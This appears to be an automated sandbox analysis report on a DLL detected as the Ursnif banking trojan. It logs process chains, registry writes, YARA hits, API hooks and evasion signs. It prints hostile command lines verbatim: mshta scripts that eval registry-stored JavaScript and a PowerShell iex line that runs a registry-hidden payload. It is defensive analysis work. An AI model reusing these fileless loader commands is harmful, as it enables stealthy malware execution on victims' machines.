                      Source: C:\Windows\System32\loaddll32.exe; WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\System32\loaddll32.exe; WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exe; WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exe; WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exe; WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\System32\loaddll32.exe; WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\regsvr32.exe; WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\regsvr32.exe; WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\regsvr32.exe; WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\regsvr32.exe; WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\regsvr32.exe; WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\regsvr32.exe; WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\regsvr32.exe; WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\regsvr32.exe; WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exe; WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\rundll32.exe; WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exe; WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exe; WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exe; WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exe; WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exe; WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exe; WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: gECym.dll; Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                      Source: C:\Windows\System32\loaddll32.exe; Code function: 0_2_100021B4
                      Source: C:\Windows\System32\loaddll32.exe; Code function: 0_2_00F00B67
                      Source: C:\Windows\System32\loaddll32.exe; Code function: 0_2_00F00B69
                      Source: C:\Windows\System32\loaddll32.exe; Code function: 0_2_10001540 SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,GetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError
                      Source: C:\Windows\System32\loaddll32.exe; Code function: 0_2_100023D5 NtQueryVirtualMemory
                      Source: C:\Windows\SysWOW64\regsvr32.exe; Section loaded: sfc.dll
                      Source: gECym.dll; Static PE information: invalid certificate
                      Source: gECym.dll; Virustotal: Detection: 10%
                      Source: gECym.dll; Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknown; Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\gECym.dll'
                      Source: C:\Windows\System32\loaddll32.exe; Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\gECym.dll',#1
                      Source: C:\Windows\System32\loaddll32.exe; Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\gECym.dll
                      Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\gECym.dll',#1
                      Source: C:\Windows\System32\loaddll32.exe; Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
                      Source: C:\Windows\System32\loaddll32.exe; Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\gECym.dll,DllUnregisterServer
                      Source: C:\Program Files\internet explorer\iexplore.exe; Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2376 CREDAT:17410 /prefetch:2
                      Source: C:\Windows\System32\loaddll32.exe; Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\gECym.dll,DllRegisterServer
                      Source: C:\Windows\System32\loaddll32.exe; Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\gECym.dll,DllGetClassObject
                      Source: unknown; Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Kf7p='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Kf7p).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>'
                      Source: unknown; Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Acbs='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Acbs).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>'
                      Source: C:\Windows\System32\mshta.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UrlsReturn))
                      Source: unknown; Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Ns0e='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ns0e).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\mshta.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UrlsReturn))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\mshta.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UrlsReturn))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\gECym.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\gECym.dll
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\gECym.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{21EC2020-3AEA-1069-A2DD-08002B30309D}\InProcServer32
                      Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{3F2CDD13-31F2-11EC-90E5-ECF4BB570DC9}.dat
                      Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\~DF062D96AA82264A2D.TMP
                      Source: classification engineClassification label: mal100.troj.evad.winDLL@26/19@24/7
                      Source: C:\Program Files\internet explorer\iexplore.exeFile read: C:\Users\desktop.ini
                      Source: C:\Windows\System32\loaddll32.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hosts

                      Data Obfuscation:

                      Suspicious powershell command line found
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UrlsReturn))
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_100021A3 push ecx; ret 0_2_100021B3
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10002150 push ecx; ret 0_2_10002159
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00F008B1 push dword ptr [esp+0Ch]; ret 0_2_00F008C5
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00F008B1 push dword ptr [esp+10h]; ret 0_2_00F0090B
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00F003B4 push dword ptr [ebp-00000284h]; ret 0_2_00F00423
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00F00576 push dword ptr [ebp-00000284h]; ret 0_2_00F00724
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00F00576 push dword ptr [ebp-0000028Ch]; ret 0_2_00F00778
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00F00576 push edx; ret 0_2_00F007C6
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00F00576 push dword ptr [esp+10h]; ret 0_2_00F008B0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00F00779 push edx; ret 0_2_00F007C6
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00F0053F push dword ptr [ebp-00000284h]; ret 0_2_00F00575
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00F00725 push edx; ret 0_2_00F007C6
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00F00382 push dword ptr [ebp-00000284h]; ret 0_2_00F0053E
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10001753 LoadLibraryA,GetProcAddress,0_2_10001753
                      Source: gECym.dllStatic PE information: real checksum: 0x4a07a should be: 0x4445d
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\gECym.dll

                      Hooking and other Techniques for Hiding and Protection:

                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000009.00000003.668818796.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.669066527.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.760454651.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.720146282.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.725551694.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.669002058.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.668792468.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.696203622.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.668767287.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.696328482.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.682552775.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.729873849.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.751457455.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.682707764.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.682497297.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.668983889.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.682925882.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.668839332.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.728388991.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.682449280.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.729934950.0000000004EDC000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.669342603.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.726873336.0000000003A3C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.668597805.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.696428988.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.696293646.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.737533634.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.668893514.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.668698618.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.762064879.000000000532C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.696353839.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.696234648.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.696265985.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.696490210.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.761914135.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.682640820.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.682808858.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.683000420.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.668889642.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.731054718.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.669161190.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.739495874.00000000058CC000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.668637384.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.669217152.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.739276832.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.668670422.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.719599695.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 2908, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 1368, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4892, type: MEMORYSTR
                      Source: Yara matchFile source: 6.2.rundll32.exe.2a90000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.f30000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.37194a0.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.37194a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.10d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000002.509157681.0000000002A90000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.796706497.0000000000F30000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.563086752.00000000030D0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.805512556.0000000010000000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.804704031.0000000003719000.00000004.00000040.sdmp, type: MEMORY
                      Hooks registry keys query functions (used to hide registry keys)
                      Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
                      Modifies the prolog of user mode functions (user mode inline hooks)
                      Source: explorer.exeUser mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
                      Modifies the export address table of user mode modules (user mode EAT hooks)
                      Source: explorer.exeIAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFA9B33521C
                      Modifies the import address table of user mode modules (user mode IAT hooks)
                      Source: explorer.exeEAT of a user mode module has changed: module: WININET.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFA9B335200
                      Source: C:\Windows\System32\loaddll32.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4904Thread sleep count: 167 > 30
                      Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4904Thread sleep time: -37408s >= -30000s
                      Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4904Thread sleep count: 69 > 30
                      Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4876Thread sleep time: -1773297476s >= -30000s
                      Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4876Thread sleep count: 79 > 30
                      Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4876Thread sleep count: 49 > 30
                      Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4876Thread sleep count: 35 > 30
                      Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4876Thread sleep count: 89 > 30
                      Source: C:\Windows\System32\loaddll32.exeProcess information queried: ProcessInformation
                      Source: loaddll32.exe, 00000000.00000002.800825641.000000000122E000.00000004.00000020.sdmp, regsvr32.exe, 00000003.00000003.751002703.000000000330F000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10001753 LoadLibraryA,GetProcAddress,0_2_10001753
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00F008B1 mov eax, dword ptr fs:[00000030h]0_2_00F008B1
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00F00576 mov eax, dword ptr fs:[00000030h]0_2_00F00576
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00F0099D mov eax, dword ptr fs:[00000030h]0_2_00F0099D
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00F007C8 mov eax, dword ptr fs:[00000030h]0_2_00F007C8
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00F0090C mov eax, dword ptr fs:[00000030h]0_2_00F0090C

                      HIPS / PFW / Operating System Protection Evasion:

                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\regsvr32.exeDomain query: aaaa.bar
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 31.220.111.98 187
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Kf7p='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Kf7p).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>'
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Acbs='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Acbs).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>'
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Ns0e='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ns0e).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>'
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\gECym.dll',#1
                      Source: loaddll32.exe, 00000000.00000002.802991988.00000000018A0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: loaddll32.exe, 00000000.00000002.802991988.00000000018A0000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: loaddll32.exe, 00000000.00000002.802991988.00000000018A0000.00000002.00020000.sdmpBinary or memory string: SProgram Managerl
                      Source: loaddll32.exe, 00000000.00000002.802991988.00000000018A0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd,
                      Source: loaddll32.exe, 00000000.00000002.802991988.00000000018A0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10001E13 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,0_2_10001E13
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10001EE5 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,0_2_10001EE5

                      Stealing of Sensitive Information:

                      Yara detected Ursnif

                      Remote Access Functionality:

                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000009.00000003.668818796.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.669066527.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.760454651.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.720146282.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.725551694.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.669002058.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.668792468.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.696203622.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.668767287.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.696328482.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.682552775.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.729873849.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.751457455.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.682707764.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.682497297.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.668983889.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.682925882.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.668839332.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.728388991.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.682449280.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.729934950.0000000004EDC000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.669342603.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.726873336.0000000003A3C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.668597805.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.696428988.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.696293646.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.737533634.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.668893514.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.668698618.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.762064879.000000000532C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.696353839.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.696234648.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.696265985.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.696490210.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.761914135.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.682640820.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.682808858.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.683000420.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.668889642.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.731054718.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.669161190.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.739495874.00000000058CC000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.668637384.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
